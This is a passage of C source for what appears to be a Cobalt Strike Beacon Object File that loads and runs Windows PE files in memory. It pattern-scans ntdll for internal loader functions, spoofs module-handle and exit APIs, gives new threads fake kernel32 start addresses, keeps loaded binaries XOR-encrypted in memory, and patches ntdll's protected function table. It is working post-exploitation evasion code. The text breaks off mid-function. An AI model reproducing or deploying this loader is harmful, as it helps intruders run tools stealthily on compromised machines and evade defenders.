    DWORD                  rva            = 0;
    DWORD                  size           = 0;
    PRUNTIME_FUNCTION      func_table     = NULL;
    PRUNTIME_FUNCTION      func_entry     = NULL;
    PVOID                  func_addr      = NULL;
    DWORD                  func_size      = 0;
    PBYTE                  bytes_to_match = (PBYTE)"\x0f\xb3\x01";
    PVOID                  address        = NULL;
    PMEMORY_STRUCTS        mem_structs    = NULL;

    /*
     * We parse the export directory to get a reference to all non-leaf functions in ntdll.
     * For each one, we check if we find the pattern matching
     */

    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->ldrp_release_tls_entry)
        return mem_structs->ldrp_release_tls_entry;

    dos    = xGetLibAddress("ntdll", TRUE, NULL);
    nt     = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);

    rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size / sizeof(RUNTIME_FUNCTION);
    func_table = RVA2VA(PRUNTIME_FUNCTION, dos, rva);
    // iterate over each non-leaf functions in ntdll
    for (DWORD i = 0; i < size; ++i)
    {
        func_entry = RVA2VA(PRUNTIME_FUNCTION, func_table, (sizeof(RUNTIME_FUNCTION) * i));
        func_addr  = RVA2VA(PVOID, dos, func_entry->BeginAddress);
        func_size  = func_entry->EndAddress - func_entry->BeginAddress;
        // search for the byte pattern on this function
        if (find_pattern(func_addr, func_size, bytes_to_match, "xxx", &address))
        {
            // save the address of the ldrp_release_tls_entry;
            if (mem_structs)
                mem_structs->ldrp_release_tls_entry = func_addr;

            return func_addr;
        }
    }

    api_not_found("LdrpReleaseTlsEntry");

    return NULL;
}

#else // _WIN64

PVOID find_ldrp_handle_tls_data(VOID)
{
    PIMAGE_NT_HEADERS      nt          = NULL;
    PIMAGE_DOS_HEADER      dos         = NULL;
    PIMAGE_SECTION_HEADER  pSection    = NULL;
    PBYTE                  nt_set_call = (PBYTE)"\x6a\x23\x6a\xff\xe8";
    PBYTE                  func_start  = (PBYTE)"\x6a\x00\x68";
    PVOID                  address     = NULL;
    PVOID                  start       = NULL;
    PVOID                  rip         = NULL;
    PVOID                  nt_set      = NULL;
    DWORD                  offset      = 0;
    PVOID                  stBegin     = NULL;
    PVOID                  stEnd       = NULL;
    DWORD                  dwLen       = 0;
    PMEMORY_STRUCTS        mem_structs = NULL;

    // on x86, there is no export directory, so we search the entire .text section

    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->ldrp_handle_tls_data)
        return mem_structs->ldrp_handle_tls_data;

    dos    = xGetLibAddress("ntdll", TRUE, NULL);
    nt     = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);
    nt_set = xGetProcAddress(dos, "NtSetInformationProcess", 0);
    if (!nt_set)
    {
        api_not_found("NtSetInformationProcess");
        return NULL;
    }

    // find the .text section
    pSection = IMAGE_FIRST_SECTION(nt);
    for (INT i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (!strncmp(".text", (LPCSTR)pSection->Name, 8))
        {
            stBegin = RVA2VA(PVOID, dos, pSection->VirtualAddress);
            dwLen = pSection->Misc.VirtualSize;
            break;
        }

        ++pSection;
    }

    if (!stBegin || !dwLen)
    {
        DPRINT("Failed to find section");
        return NULL;
    }

    stEnd = RVA2VA(PVOID, stBegin, dwLen);

    while ((ULONG_PTR)stBegin + 5 < (ULONG_PTR)stEnd)
    {
        dwLen = (ULONG_PTR)stEnd - (ULONG_PTR)stBegin;
        if (find_pattern(stBegin, dwLen, nt_set_call, "xxxxx", &address))
        {
            /*
             * We found a function call with the parameters -1 and 0x28, lets confirm
             * the function being called is indeed NtSetInformationProcess
             */

            rip     = RVA2VA(PVOID, address, 5 + sizeof(DWORD));
            offset  = (ULONG_PTR)nt_set - (ULONG_PTR)rip;
            address = RVA2VA(PVOID, address, 5);
            if (*(PDWORD)address == offset)
            {
                /*
                 * If the offset matches, then the function being call is NtSetInformationProcess,
                 * but on x86, we still need to find the start of the function, we use another
                 * pattern match for that
                 */

                for (int i = 0; i < 0x300; ++i)
                {
                    start = RVA2VA(PVOID, address, - i);
                    if (find_pattern(start, 3, func_start, "x?x", NULL))
                    {
                        // save the address of the ldrp_handle_tls_data;
                        if (mem_structs)
                            mem_structs->ldrp_handle_tls_data = start;

                        return start;
                    }
                }
            }

            stBegin = address;
        }
        else
        {
            break;
        }
    }

    api_not_found("LdrpHandleTlsData")

    return NULL;
}

PVOID find_ldrp_release_tls_entry(VOID)
{
    PIMAGE_NT_HEADERS      nt          = NULL;
    PIMAGE_DOS_HEADER      dos         = NULL;
    PIMAGE_SECTION_HEADER  pSection    = NULL;
    PBYTE                  peb_bytes   = (PBYTE)"\x64\xa1\x30\x00\x00\x00\x56\x57\xff\x70\x18";
    PBYTE                  func_start  = (PBYTE)"\x8b\xff";
    PVOID                  address     = NULL;
    PVOID                  start       = NULL;
    PVOID                  stBegin     = NULL;
    PVOID                  stEnd       = NULL;
    DWORD                  dwLen       = 0;
    PMEMORY_STRUCTS        mem_structs = NULL;

    // on x86, there is no export directory, so we search the entire .text section

    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->ldrp_release_tls_entry)
        return mem_structs->ldrp_release_tls_entry;

    dos    = xGetLibAddress("ntdll", TRUE, NULL);
    nt     = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);

    // find the .text section
    pSection = IMAGE_FIRST_SECTION(nt);
    for (INT i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (!strncmp(".text", (LPCSTR)pSection->Name, 8))
        {
            stBegin = RVA2VA(PVOID, dos, pSection->VirtualAddress);
            dwLen = pSection->Misc.VirtualSize;
            break;
        }

        ++pSection;
    }

    if (!stBegin || !dwLen)
    {
        DPRINT("Failed to find section");
        return NULL;
    }

    stEnd = RVA2VA(PVOID, stBegin, dwLen);

    while ((ULONG_PTR)stBegin + 11 < (ULONG_PTR)stEnd)
    {
        dwLen = (ULONG_PTR)stEnd - (ULONG_PTR)stBegin;
        if (find_pattern(stBegin, dwLen, peb_bytes, "xxxxxxxxxxx", &address))
        {
            for (int i = 0; i < 0x100; ++i)
            {
                start = RVA2VA(PVOID, address, - i);
                if (find_pattern(start, 2, func_start, "xx", NULL))
                {
                    // save the address of the ldrp_release_tls_entry;
                    if (mem_structs)
                        mem_structs->ldrp_release_tls_entry = start;

                    return start;
                }
            }

            stBegin = address;
        }
        else
        {
            break;
        }
    }

    api_not_found("LdrpReleaseTlsEntry")

    return NULL;
}

#endif

VOID insert_tail_list(
    PLIST_ENTRY ListHead,
    PLIST_ENTRY Entry)
{
    PLIST_ENTRY Blink;

    Blink = ListHead->Blink;
    Entry->Flink = ListHead;
    Entry->Blink = Blink;
    Blink->Flink = Entry;
    ListHead->Blink = Entry;
}

VOID unlink_from_list(
    PLIST_ENTRY Entry)
{
    Entry->Flink->Blink = Entry->Blink;
    Entry->Blink->Flink = Entry->Flink;
}

SIZE_T StringLengthA(
    IN LPCSTR String)
{
    LPCSTR String2;

    if ( String == NULL )
        return 0;

    for (String2 = String; *String2; ++String2);

    return (String2 - String);
}

PCHAR StringConcatA(
    IN PCHAR String,
    IN PCHAR String2)
{
    StringCopyA( &String[ StringLengthA( String ) ], String2 );

    return String;
}

VOID myRtlInitUnicodeString(
    OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString)
{
    SIZE_T Length;

    DestinationString->MaximumLength = 0;
    DestinationString->Length = 0;
    DestinationString->Buffer = (PWCH)SourceString;

    if (ARGUMENT_PRESENT(SourceString)) {
        Length = StringLengthW(SourceString) * sizeof(WCHAR);
        if (Length >= MAX_USTRING) {
            Length = MAX_USTRING - sizeof(UNICODE_NULL);
        }

        DestinationString->Length = (USHORT)Length;
        DestinationString->MaximumLength = (USHORT)(Length + sizeof(UNICODE_NULL));
    }
}

SIZE_T StringLengthW(
    IN LPCWSTR String)
{
    LPCWSTR String2;

    for (String2 = String; *String2; ++String2);

    return (String2 - String);
}

PCHAR StringCopyA(
    IN PCHAR String1,
    IN PCHAR String2)
{
    PCHAR p = String1;

    while ((*p++ = *String2++) != 0);

    return String1;
}

SIZE_T WCharStringToCharString(
    IN PCHAR Destination,
    IN PWCHAR Source,
    IN SIZE_T MaximumAllowed)
{
    INT Length = MaximumAllowed;

    if (!MaximumAllowed)
        return 0;

    while (--Length >= 0)
    {
        if (!(*Destination++ = *Source++))
            return MaximumAllowed - Length - 1;
    }

    return MaximumAllowed - Length;
}

SIZE_T CharStringToWCharString(
    IN PWCHAR Destination,
    IN PCHAR Source,
    IN SIZE_T MaximumAllowed)
{
    INT Length = (INT)MaximumAllowed;

    while (--Length >= 0)
    {
        if ( ! ( *Destination++ = *Source++ ) )
            return MaximumAllowed - Length - 1;
    }

    return MaximumAllowed - Length;
}

LONG RtlCompareUnicodeString(
    IN PCUNICODE_STRING String1,
    IN PCUNICODE_STRING String2,
    IN BOOLEAN CaseInSensitive)
{
    return RtlCompareUnicodeStrings(String1->Buffer, String1->Length,
                                    String2->Buffer, String2->Length,
                                    CaseInSensitive);
}

VOID RtlInitEmptyUnicodeString(
    OUT PUNICODE_STRING UnicodeString,
    IN PWCHAR Buffer,
    IN UINT16 BufferSize)
{
    memset(UnicodeString, 0, sizeof(*UnicodeString));
    UnicodeString->MaximumLength = BufferSize;
    UnicodeString->Buffer = Buffer;
}

LONG RtlCompareUnicodeStrings(
    IN CONST WCHAR* String1,
    IN SIZE_T Length1,
    IN CONST WCHAR* String2,
    IN SIZE_T Length2,
    IN BOOLEAN CaseInSensitive)
{
    CONST WCHAR* s1, * s2, * Limit;
    LONG n1, n2;
    UINT32 c1, c2;

    if (Length1 > LONG_MAX || Length2 > LONG_MAX) {
        return STATUS_INVALID_BUFFER_SIZE;
    }

    s1 = String1;
    s2 = String2;
    n1 = (LONG)Length1;
    n2 = (LONG)Length2;

    Limit = (WCHAR*)((CHAR*)s1 + (n1 <= n2 ? n1 : n2));
    if (CaseInSensitive) {
        while (s1 < Limit) {
            c1 = *s1;
            c2 = *s2;
            if (c1 != c2) {

                //
                // Note that this needs to reference the translation table!
                //
                c1 = RTL_UPCASE(c1);
                c2 = RTL_UPCASE(c2);
                if (c1 != c2) {
                    return (INT32)(c1)-(INT32)(c2);
                }
            }
            s1 += 1;
            s2 += 1;
        }

    } else {

        while (s1 < Limit) {
            c1 = *s1;
            c2 = *s2;
            if (c1 != c2) {
                return (LONG)(c1)-(LONG)(c2);
            }
            s1 += 1;
            s2 += 1;
        }
    }

    return n1 - n2;
}

BOOL string_is_included(
    IN PCHAR list_of_strings,
    IN PCHAR string_to_search)
{
    CHAR  some_string[256] = { 0 };
    INT   i                = 0;

    for (;;)
    {
        // store string until null byte, semi-colon or comma encountered
        for (i = 0; list_of_strings[i] != '\0' &&
                    list_of_strings[i] != ';' &&
                    list_of_strings[i] != ',' && i < 256; i++) some_string[i] = list_of_strings[i];
        // nothing stored? end
        if (i == 0) break;
        // skip name plus one for separator
        list_of_strings += (i + 1);
        // store null terminator
        some_string[i] = '\0';
        // if equal, return TRUE
        if (!_stricmp(some_string, string_to_search)) return TRUE;
    }
    return FALSE;
}

BOOL compare_bytes(
    IN PBYTE pData,
    IN PBYTE bMask,
    IN PCHAR szMask)
{
    for (; *szMask; ++szMask, ++pData, ++bMask)
    {
        if (*szMask == 'x' && *pData != *bMask)
            return FALSE;
    }

    return TRUE;
}

BOOL find_pattern(
    IN PVOID dwAddress,
    IN ULONG32 dwLen,
    IN PBYTE bMask,
    IN PCHAR szMask,
    OUT PVOID* pattern_addr)
{
    PVOID current_address = NULL;
    for (ULONG32 i = 0; i < dwLen; i++)
    {
        current_address = RVA2VA(PVOID, dwAddress, i);
        if (compare_bytes(current_address, bMask, szMask))
        {
            if (pattern_addr)
                *pattern_addr = current_address;
            return TRUE;
        }
    }

    return FALSE;
}

// check if bytes are from a windows PE
BOOL is_pe(
    IN HMODULE hLibrary)
{
    PIMAGE_DOS_HEADER dos = NULL;
    PIMAGE_NT_HEADERS nt  = NULL;

    if (!hLibrary)
        return FALSE;

    dos = (PIMAGE_DOS_HEADER)hLibrary;

    // check the MZ magic bytes
    if (dos->e_magic != 0x5A4D)
        return FALSE;

    nt = RVA2VA(PIMAGE_NT_HEADERS, hLibrary, dos->e_lfanew);

    // check the NT_HEADER signature
    if (nt->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;

    return TRUE;
}

// check if bytes are from a windows DLL
BOOL is_dll(
    IN HMODULE hLibrary)
{
    PIMAGE_DOS_HEADER dos             = NULL;
    PIMAGE_NT_HEADERS nt              = NULL;
    USHORT            Characteristics = 0;

    if (!is_pe(hLibrary))
        return FALSE;

    dos = (PIMAGE_DOS_HEADER)hLibrary;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, hLibrary, dos->e_lfanew);

    // check that it is a DLL and not an EXE
    Characteristics = nt->FileHeader.Characteristics;
    if ((Characteristics & IMAGE_FILE_DLL) != IMAGE_FILE_DLL)
        return FALSE;

    return TRUE;
}

// remember we loaded this DLL by adding it to the 'libs_loaded' linked list
VOID store_loaded_dll(
    IN PLOADED_PE_INFO peinfo,
    IN HMODULE dll,
    IN PCHAR name)
{
    PLIBS_LOADED libs_loaded = NULL;
    PLIB_LOADED  lib_loaded = NULL;

    if (!peinfo)
        return;

    // first, check we didn't include this lib already
    libs_loaded = BeaconGetValue(NC_LOADED_DLL_KEY);
    lib_loaded = (PLIB_LOADED)libs_loaded->list.Flink;
    while (&lib_loaded->list != &libs_loaded->list)
    {
        if (!_stricmp(lib_loaded->peinfo->pe_name, name))
            return;

        lib_loaded = (PLIB_LOADED)lib_loaded->list.Flink;
    }

    // add this DLL to the linked list
    lib_loaded = intAlloc((sizeof(LIB_LOADED)));
    if (!lib_loaded)
        return;
    StringCopyA(lib_loaded->name, name);
    lib_loaded->address = dll;
    lib_loaded->peinfo  = peinfo;

    insert_tail_list(&libs_loaded->list, &lib_loaded->list);
}

/*
 * Some PEs will search for APIs at runtime
 * we need to spoof these as well if we want to prevent
 * our process from exiting.
 * PsExec searches for mscoree!CorExitProcess and calls it if found.
 * This only happens if the CLR is loaded (i.e. PowerShell has been run)
 */
FARPROC WINAPI my_get_proc_address(
    IN HMODULE hModule,
    IN LPSTR lpProcName)
{
    return handle_import(NULL, hModule, NULL, lpProcName);
}

/*
 * If the PE calls GetModuleHandleW(NULL), we need to return
 * the base of our module, instead of the base of the host process
 */
HMODULE WINAPI my_get_module_handle_w(
  IN LPCWSTR lpModuleName)
{
    PLOADED_PE_INFO peinfo = NULL;

    if (!lpModuleName)
    {
        peinfo = BeaconGetValue(NC_PE_INFO_KEY);
        if (peinfo)
        {
            DPRINT("GetModuleHandleW(NULL) was called, returning 0x%p", peinfo->pe_base);
            return peinfo->pe_base;
        }
    }

    // call the original GetModuleHandleW
    HMODULE ( WINAPI *GetModuleHandleW ) ( LPCWSTR ) = xGetProcAddress(xGetLibAddress("kernelbase", TRUE, NULL), "GetModuleHandleW", 0);
    if (GetModuleHandleW)
    {
        return GetModuleHandleW(lpModuleName);
    }
    else
    {
        api_not_found("GetModuleHandleW");
        return NULL;
    }
}

HANDLE get_console_handle(VOID)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    return ProcessParameters->ConsoleHandle;
}

VOID set_console_handle(
    IN HANDLE hConsoleHandle)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    ProcessParameters->ConsoleHandle = hConsoleHandle;
}

HANDLE get_std_out_handle(VOID)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    return ProcessParameters->StandardOutput;
}

VOID set_std_out_handle(
    IN HANDLE hStdOutErr)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    ProcessParameters->StandardOutput = hStdOutErr;
}

HANDLE get_std_err_handle(VOID)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    return ProcessParameters->StandardError;
}

VOID set_std_err_handle(
    IN HANDLE hStdOutErr)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    ProcessParameters->StandardError = hStdOutErr;
}

HANDLE get_std_in_handle(VOID)
{
    uPRTL_USER_PROCESS_PARAMETERS ProcessParameters = (uPRTL_USER_PROCESS_PARAMETERS)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    return ProcessParameters->StandardInput;
}

DWORD get_tid(VOID)
{
    return (DWORD)(ULONG_PTR)((PTEB2)NtCurrentTeb())->ClientId.UniqueThread;
}

VOID rtl_exit_user_thread(VOID)
{
    PEXEC_CTX exec_ctx = BeaconGetValue(NC_EXEC_CTX);

    // do we have a execution context saved?
    if (exec_ctx)
    {
        // ensure this is the main thread
        if (exec_ctx->Tid == get_tid())
        {
            // PE has exited, restore the execution context
#ifdef _WIN64
            __asm__(
                "mov rsp, rax \n"
                "mov rbp, rdx \n"
                "jmp rcx \n"
                : // no outputs
                : "r" (exec_ctx->Rsp), // RAX IN
                  "r" (exec_ctx->Rbp), // RDX IN
                  "r" (exec_ctx->Rip)  // RCX IN
            );
#else
            __asm__(
                "mov esp, eax \n"
                "mov ebp, edx \n"
                "jmp ecx \n"
                : // no outputs
                : "r" (exec_ctx->Rsp), // EAX IN
                  "r" (exec_ctx->Rbp), // EDX IN
                  "r" (exec_ctx->Rip)  // ECX IN
            );
#endif
        }
    }

    // either there is no execution context saved or this is not the main thread, simply exit
    VOID ( WINAPI *RtlExitUserThread ) ( NTSTATUS ) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlExitUserThread", 0);
    if (RtlExitUserThread)
    {
        return RtlExitUserThread(0);
    }
    else
    {
        api_not_found("RtlExitUserThread");
    }
}

BOOL create_thread(
    OUT PHANDLE hThread)
{
    time_t   t             = { 0 };
    UINT32   ordinal       = 0;
    PVOID    start_address = NULL;
    NTSTATUS status        = STATUS_UNSUCCESSFUL;

    if (!hThread)
        return FALSE;

    VOID (WINAPI *srand) (int) = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "srand", 0);
    int (WINAPI *rand) (void)  = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "rand", 0);

    if (!srand)
    {
        api_not_found("srand");
        return FALSE;
    }

    if (!rand)
    {
        api_not_found("rand");
        return FALSE;
    }

    time_t (WINAPI* time) (time_t*) = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "time", 0);

    if (!time)
    {
        api_not_found("time");
        return FALSE;
    }

    srand((unsigned) time(&t));

    // obtain a "valid" start address by getting a random Kernel32 API address
    while (!start_address)
    {
        ordinal = rand() & (256 - 1);
        start_address = xGetProcAddress(xGetLibAddress("kernel32", TRUE, NULL), NULL, ordinal);
    }

    status = NtCreateThreadEx(hThread, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), start_address, NULL, 1, 0, 0, 0, NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateThreadEx", status);
        return FALSE;
    }

    DPRINT("Created thread with 0x%p as start address", start_address);

    return TRUE;
}

BOOL read_local_pe(
    IN LPCTSTR path,
    OUT PVOID* data,
    OUT int* pelen)
{
    BOOL          ret_val    = FALSE;
    HANDLE        hFile      = NULL;
    DWORD         bRead      = 0;
    LARGE_INTEGER lpFileSize = { 0 };
    PBYTE         pe         = NULL;

    // Try and open a handle to the specified file
    hFile = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        PRINT_ERR("Unable to open %s. Last error: %d", path, GetLastError());
        goto Cleanup;
    }

    // Get size of file
    if(!GetFileSizeEx(hFile, &lpFileSize))
    {
        function_failed("GetFileSizeEx");
        goto Cleanup;
    }

    // Allocate buffer to hold the PE
    pe = intAlloc(lpFileSize.LowPart + 1);
    if (!pe)
    {
        malloc_failed();
        goto Cleanup;
    }

    // Read file into buffer
    if(!ReadFile(hFile, pe, lpFileSize.LowPart, &bRead, NULL))
    {
        function_failed("ReadFile");
        goto Cleanup;
    }

    *data  = pe;
    *pelen = lpFileSize.LowPart;

    ret_val = TRUE;

Cleanup:
    if (hFile && hFile != INVALID_HANDLE_VALUE)
        NtClose(hFile);

    if (pe && !ret_val)
    {
        memset(pe, 0, lpFileSize.LowPart);
        intFree(pe);
        pe = NULL;
    }

    return ret_val;
}

PSAVED_PE find_pe_by_name(
    IN LPSTR pe_name)
{
    PSAVED_PE saved_pe = NULL;

    saved_pe = BeaconGetValue(NC_SAVED_PE_KEY);
    while (saved_pe)
    {
        if (!_stricmp(saved_pe->pe_name, pe_name))
            break;

        saved_pe = saved_pe->next;
    }

    if (!saved_pe)
    {
        DPRINT("%s was not found", pe_name);
        return NULL;
    }

    return saved_pe;
}

VOID run_xor_on_pe(
    IN PSAVED_PE saved_pe)
{
    PBYTE xor_key = NULL;
    BYTE  tmp     = 0;

    xor_key = intAlloc(saved_pe->xor_length);
    if (!xor_key)
    {
        malloc_failed();
        return;
    }
    memcpy(xor_key, saved_pe->xor_key, saved_pe->xor_length);

    if (saved_pe->encrypted)
    {
        // decrypt
        for (int i = 0; i < saved_pe->pe_size; ++i)
        {
            tmp = saved_pe->pe_base[i];
            saved_pe->pe_base[i] ^= xor_key[i % saved_pe->xor_length];
            xor_key[i % saved_pe->xor_length] = tmp;
        }
    }
    else
    {
        // encrypt
        for (int i = 0; i < saved_pe->pe_size; ++i)
        {
            saved_pe->pe_base[i] ^= xor_key[i % saved_pe->xor_length];
            xor_key[i % saved_pe->xor_length] = saved_pe->pe_base[i];
        }
    }

    memset(xor_key, 0, saved_pe->xor_length);
    intFree(xor_key);
    saved_pe->encrypted = !saved_pe->encrypted;
}

BOOL save_pe_info(
    IN LPSTR pe_name,
    IN PBYTE pe_bytes,
    IN int   pe_length,
    IN LPSTR loadtime)
{
    PSAVED_PE saved_pe = NULL;
    PSAVED_PE tmp      = NULL;
    time_t   t         = { 0 };

    if (!pe_name || !pe_bytes || !pe_length)
        return TRUE;

    // check the PE is not already saved
    if (find_pe_by_name(pe_name))
    {
        DPRINT("The PE %s is already saved", pe_name);
        return TRUE;
    }

    VOID (WINAPI *srand) (int) = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "srand", 0);
    int (WINAPI *rand) (void)  = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "rand", 0);
    time_t (WINAPI* time) (time_t*) = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "time", 0);

    if (!srand)
    {
        api_not_found("srand");
        return FALSE;
    }

    if (!rand)
    {
        api_not_found("rand");
        return FALSE;
    }

    if (!time)
    {
        api_not_found("time");
        return FALSE;
    }

    // allocate the SAVED_PE structure
    saved_pe = intAlloc(sizeof(SAVED_PE));

    // generate a random XOR key
    srand((unsigned) time(&t));

    saved_pe->xor_length = rand() & (256 - 1);

    if (saved_pe->xor_length < MIN_XOR_KEY_LENGTH)
        saved_pe->xor_length = MIN_XOR_KEY_LENGTH;

    saved_pe->xor_key = intAlloc(saved_pe->xor_length);

    for (int i = 0; i < saved_pe->xor_length; ++i)
    {
        saved_pe->xor_key[i] = rand() & (256 - 1);
    }

    // store the PE
    saved_pe->pe_size = pe_length;
    saved_pe->pe_base = intAlloc(saved_pe->pe_size);
    if (!saved_pe->pe_base)
    {
        function_failed("malloc");
        return FALSE;
    }

    memcpy(saved_pe->pe_base, pe_bytes, pe_length);

    // encrypt the PE
    run_xor_on_pe(saved_pe);
    StringCopyA(saved_pe->pe_name, pe_name);
    StringCopyA(saved_pe->loadtime, loadtime);

    // add PE to linked list
    tmp = BeaconGetValue(NC_SAVED_PE_KEY);
    if (!tmp)
    {
        // save the PE linked list
        if (!BeaconAddValue(NC_SAVED_PE_KEY, saved_pe))
        {
            function_failed("BeaconAddValue");
            return FALSE;
        }
    }
    else
    {
        while (tmp)
        {
            if (!tmp->next)
            {
                tmp->next = saved_pe;
                break;
            }

            tmp = tmp->next;
        }
    }

    return TRUE;
}

BOOL get_saved_pe(
    IN  LPSTR  pe_name,
    OUT PVOID* data,
    OUT int*   pelen)
{
    PSAVED_PE saved_pe = NULL;

    saved_pe = find_pe_by_name(pe_name);
    if (!saved_pe)
        return FALSE;

    DPRINT("Found %s", saved_pe->pe_name);

    if (saved_pe->encrypted)
    {
        // decrypt the PE
        run_xor_on_pe(saved_pe);

        DPRINT("decrypted binary")
    }

    *data  = saved_pe->pe_base;
    *pelen = saved_pe->pe_size;

    return TRUE;
}

BOOL reencrypt_pe(
    IN LPSTR pe_name)
{
    PSAVED_PE saved_pe = NULL;

    saved_pe = find_pe_by_name(pe_name);
    if (!saved_pe)
        return FALSE;

    if (!saved_pe->encrypted)
    {
        // encrypt the PE
        run_xor_on_pe(saved_pe);

        DPRINT("reencrypted %s", saved_pe->pe_name);
    }

    return TRUE;
}

VOID list_saved_pes()
{
    PSAVED_PE saved_pe = NULL;

    saved_pe = BeaconGetValue(NC_SAVED_PE_KEY);
    if (!saved_pe)
    {
        PRINT("There are no saved PEs in memory");
    }
    else
    {
        PRINT("Saved PEs:");
        while (saved_pe)
        {
            PRINT("- name: %s, time: %s", saved_pe->pe_name, saved_pe->loadtime);
            saved_pe = saved_pe->next;
        }
    }
}

BOOL remove_saved_pe(
    IN  LPSTR  pe_name)
{
    PSAVED_PE saved_pe = NULL;
    PSAVED_PE tmp      = NULL;

    // look for the PE by name
    saved_pe = BeaconGetValue(NC_SAVED_PE_KEY);
    while (saved_pe)
    {
        if (!_stricmp(saved_pe->pe_name, pe_name))
        {
            // remove PE from linked list
            if (!tmp)
            {
                if (!BeaconRemoveValue(NC_SAVED_PE_KEY))
                {
                    function_failed("BeaconRemoveValue");
                    return FALSE;
                }

                if (saved_pe->next)
                {
                    if (!BeaconAddValue(NC_SAVED_PE_KEY, saved_pe->next))
                    {
                        function_failed("BeaconAddValue");
                        return FALSE;
                    }
                }
            }
            else
            {
                tmp->next = saved_pe->next;
            }

            break;
        }

        tmp = saved_pe;
        saved_pe = saved_pe->next;
    }

    if (!saved_pe)
    {
        DPRINT("%s was not found", pe_name);
        return FALSE;
    }

    memset(saved_pe->xor_key, 0, saved_pe->xor_length);
    intFree(saved_pe->xor_key);

    memset(saved_pe->pe_base, 0, saved_pe->pe_size);
    intFree(saved_pe->pe_base);

    memset(saved_pe, 0, sizeof(SAVED_PE));
    intFree(saved_pe);

    return TRUE;
}

#ifdef _WIN64

/*
 * The .mrdata section where the inverted function table
 * is stored is read-only by default, we need to set it to
 * read-write before we add a new entry and restore it
 * once we are done
 */
BOOL protect_inverted_function_table(
    IN BOOL protect)
{
    PVOID                  stBegin   = 0;
    SIZE_T                 len       = 0;
    PIMAGE_NT_HEADERS      nt        = NULL;
    PIMAGE_SECTION_HEADER  pSection  = NULL;
    DWORD                  newprot   = protect ? PAGE_READONLY : PAGE_READWRITE;
    DWORD                  oldprot   = 0;
    NTSTATUS               status    = STATUS_UNSUCCESSFUL;
    PIMAGE_DOS_HEADER      dos       = NULL;

    dos = xGetLibAddress("ntdll", TRUE, NULL);
    nt  = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);

    // find the .mrdata section
    pSection = IMAGE_FIRST_SECTION(nt);
    for (INT i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (!strncmp(".mrdata", (LPCSTR)pSection->Name, 8))
        {
            stBegin = RVA2VA(PVOID, dos, pSection->VirtualAddress);
            len = pSection->Misc.VirtualSize;
            break;
        }

        ++pSection;
    }

    if (!stBegin || !len)
    {
        DPRINT("Failed to find section");
        return FALSE;
    }

    status = NtProtectVirtualMemory(NtCurrentProcess(), &stBegin, &len, newprot, &oldprot);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtProtectVirtualMemory", status);
        return FALSE;
    }

    return TRUE;
}

/*
 * The inverted function table is stored at .mrdata
 * and it holds one entry for each currently loaded DLL
 * that has an exception directory.
 * We can find it in memory by loking for NTDLL's entry
 * which is always first in the array.
 */
PVOID find_inverted_function_table()
{
    PVOID                         stEnd       = 0;
    PVOID                         stBegin     = 0;
    DWORD                         dwLen       = 0;
    DWORD                         rva         = 0;
    SIZE_T                        stRet       = 0;
    PIMAGE_NT_HEADERS             nt          = NULL;
    PIMAGE_SECTION_HEADER         pSection    = NULL;
    INVERTED_FUNCTION_TABLE_ENTRY ntdll_entry = { 0 };
    PIMAGE_DOS_HEADER             dos         = NULL;

    // reference: https://github.com/bats3c/DarkLoadLibrary/blob/6de15faa2cbc2b909500a67e854980deb0c0ba8c/DarkLoadLibrary/src/pebutils.c#L59

    dos = xGetLibAddress("ntdll", TRUE, NULL);
    nt  = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;

